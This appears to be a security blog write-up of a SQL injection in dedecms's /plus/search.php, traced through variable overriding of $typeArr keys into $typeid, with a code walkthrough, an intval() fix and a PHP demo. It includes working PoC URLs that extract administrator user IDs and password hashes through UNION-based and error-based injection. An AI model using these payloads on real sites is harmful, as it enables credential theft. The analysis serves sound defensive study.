dedecms /plus/search.php SQL Injection && Local Variable Overriding
2017-11-26 16:06
1. Vulnerability description
This file contains two injection flaws:
1. $typeid variable overriding forces ChannelTypeid to be changed: low risk
2. Local variable overriding injection through $typeArr, combined with $typeid variable overriding, leads to SQL injection: high risk
Relevant Link:
http://graysb.diandian.com/post/2013-03-10/40049018798
http://0day5.com/archives/341
2. Trigger conditions
0x1: POC1
http://dede/plus/search.php?typeid=1&keyword=test
/*
The request URL must carry keyword, because search.php checks it:
if(($keyword=='' || strlen($keyword)<2) && empty($typeid))
{
    ShowMsg('关键字不能小于2个字节!','-1');
    exit();
}
*/
0x2: POC2
http://localhost/dede/plus/search.php?typeArr[1%201%3d2union%20select%20pwd%20from%20dede_admin]=11&kwtype=0&q=11
//the key of $typeArr is itself the payload; keyword must be identical to the value stored under that key
0x3: Safe Alert: Request Error step 2 !
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
0x4: Safe Alert: Request Error step 1 !
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
Relevant Link:
http://zone.wooyun.org/content/2414
3. Affected scope
4. Code analysis
0x1: $typeid variable overriding forces ChannelTypeid to be changed
\plus\search.php
    ..
    $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
    ..
    $sp = new SearchView($typeid,$keyword,$orderby,$channeltype,$searchtype,$starttime,$pagesize,$kwtype,$mid);
    ..
\include\arc.searchview.class.php
    ...
    //PHP5 constructor
    function __construct($typeid,$keyword,$orderby,$achanneltype="all", $searchtype='',$starttime=0,$upagesize=20,$kwtype=1,$mid=0)
    {
        global $cfg_search_max,$cfg_search_maxrc,$cfg_search_time;
        if(empty($upagesize))
        {
            $upagesize = 10;
        }
        //assigned directly, without normalisation
        $this->TypeID = $typeid;
        ..
    }
    ..
0x2: Local variable overriding injection through $typeArr + $typeid variable overriding leads to SQL injection
\plus\search.php
    //look up the column (category) information
    if(empty($typeid))
    {
        ...
        //load the column name cache and check whether the keyword matches any column
        require_once($typenameCacheFile);
        //an attacker changes the value of $typeArr through the local variable overriding flaw and so enters this if branch
        if(isset($typeArr) && is_array($typeArr))
        {
            //1. iterate over the global array $typeArr, taking each key/value pair
            foreach($typeArr as $id => $typename)
            {
                /*
                2. remove from the user-supplied keyword parameter $keyword every value that occurs in the global array $typeArr; in other words, $typeArr was meant to serve as an array of sensitive keywords
                3. note that str_replace() returns the array or string after replacement
                4. if one of the stored keywords (a value of $typeArr) is detected in the $keyword parameter we passed, it is filtered out and removed
                */
                $keywordn = str_replace($typename, ' ', $keyword);
                if($keyword != $keywordn)
                {
                    $keyword = $keywordn;
                    //5. but during this filtering another local variable override happens: $typeid takes the array key and is passed "directly" into the subsequent SQL query
                    $typeid = $id;
                    break;
                }
            }
        }
    }
\include\arc.searchview.class.php
    function __construct($typeid,$keyword,$orderby,$achanneltype="all", $searchtype='',$starttime=0,$upagesize=20,$kwtype=1,$mid=0)
    {
        ..
        $this->TypeID = $typeid;
        ...
        else
        {
            //$this->TypeID, which may contain the attacker's injected malformed characters, goes straight into the SQL query
            $row = $this->dsql->GetOne("SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}");
            $this->ChannelTypeid = $row['channeltype'];
        }
        ..
    }
    ..
The injection here is carried through the array key rather than the array value.
Relevant Link:
http://www.2cto.com/Article/201301/184105.html
5. Defense
\plus\search.php
    //look up the column (category) information
    if(empty($typeid))
    {
        ..
        if($keyword != $keywordn)
        {
            $keyword = HtmlReplace($keywordn);
            //normalise the array key $id
            $typeid = intval($id);
            break;
        }
        ..
    }
    ..
    //normalise $typeid
    $typeid = intval($typeid);
    ..
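The following is an added, stand-alone example and not dedecms code. It reproduces the $typeArr -> $typeid flow from the analysis in section 4 and places the intval() fix from section 5 next to the vulnerable assignment, so the effect of the key normalisation can be seen on a constructed request. The function names, the "dede_" table prefix and the request string are this example's own assumptions; the request is constructed for the demonstration and is not one of the PoCs above.

```php
<?php
// Added example, not dedecms code: reproduces the $typeArr -> $typeid flow of
// /plus/search.php and contrasts the vulnerable key assignment with the
// intval() fix. Function names and the "dede_" prefix are assumptions.

// Stand-in for the local variable overriding step: typeArr[...] entries from
// the query string replace the cached $typeArr array. parse_str() decodes the
// key, so %3d or %20 inside the brackets survive into the array key itself.
function typeArrFromQuery(string $queryString): array
{
    parse_str($queryString, $params);
    $typeArr = $params['typeArr'] ?? [];
    return is_array($typeArr) ? $typeArr : [];
}

// Mirrors the original branch: when a value of $typeArr occurs in $keyword,
// the array KEY is copied into $typeid without any normalisation.
function resolveTypeidVulnerable(array $typeArr, string $keyword, $typeid = 0)
{
    if (empty($typeid)) {
        foreach ($typeArr as $id => $typename) {
            $keywordn = str_replace((string) $typename, ' ', $keyword);
            if ($keyword != $keywordn) {
                $typeid = $id; // attacker-controlled key, used verbatim in SQL
                break;
            }
        }
    }
    return $typeid;
}

// The fix from section 5: cast the key, and the final $typeid, with intval(),
// so only an integer can ever reach the WHERE clause.
function resolveTypeidFixed(array $typeArr, string $keyword, $typeid = 0): int
{
    if (empty($typeid)) {
        foreach ($typeArr as $id => $typename) {
            $keywordn = str_replace((string) $typename, ' ', $keyword);
            if ($keyword != $keywordn) {
                $typeid = intval($id);
                break;
            }
        }
    }
    return intval($typeid);
}

// The query composed in arc.searchview.class.php; "#@__" is dedecms's prefix
// placeholder, shown here with the assumed prefix "dede_" for readability.
function channelTypeQuery($typeid): string
{
    return "SELECT channeltype FROM `dede_arctype` WHERE id={$typeid}";
}

// Constructed request: the array key is a non-numeric string and the value
// equals the keyword, so the str_replace() branch fires and $typeid := key.
$query   = 'typeArr[1%20or%201%3d1]=abc&kwtype=0&q=abc';
$keyword = 'abc';
$typeArr = typeArrFromQuery($query);

echo "vulnerable: ", channelTypeQuery(resolveTypeidVulnerable($typeArr, $keyword)), "\n";
echo "fixed:      ", channelTypeQuery(resolveTypeidFixed($typeArr, $keyword)), "\n";
```

Run it with `php example.php`: the vulnerable line shows the raw array key inside the WHERE clause, while the fixed line shows an integer id only. Note that the `is_numeric()` check at the top of search.php does not help here, because the override happens later, inside the `empty($typeid)` branch; that is why the fix has to cast `$id` at the point of assignment and cast `$typeid` again before it is handed to SearchView.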
6. Offense and defense thoughts
Copyright (c) 2015 LittleHann All rights reserved